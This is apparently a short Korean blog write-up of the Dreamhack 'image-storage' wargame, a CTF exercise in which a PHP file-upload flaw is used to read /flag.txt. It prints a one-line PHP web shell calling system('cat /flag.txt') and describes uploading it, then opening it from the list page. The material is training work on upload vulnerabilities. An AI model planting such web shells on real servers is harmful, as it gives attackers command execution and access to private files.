[Dreamhack] image-storage

Wargame/Web

월루이 2022. 6. 13. 08:50

image-storage

php로 작성된 파일 저장 서비스입니다. 파일 업로드 취약점을 이용해 플래그를 획득하세요. 플래그는 /flag.txt에 있습니다. Reference Server-side Basic

dreamhack.io

File upload 문제이다.

문제에서 flag.txt를 읽어보라 했으니

cat 명령어를 이용한 웹셀을 올려보자.

<? php system('cat /flag.txt'); 
?>

웹셀을 upload 페이지에 올리고, list 페이지에서 올린 웹셀을 확인하여

읽어보면 아래와 같이 flag를 알 수 있다.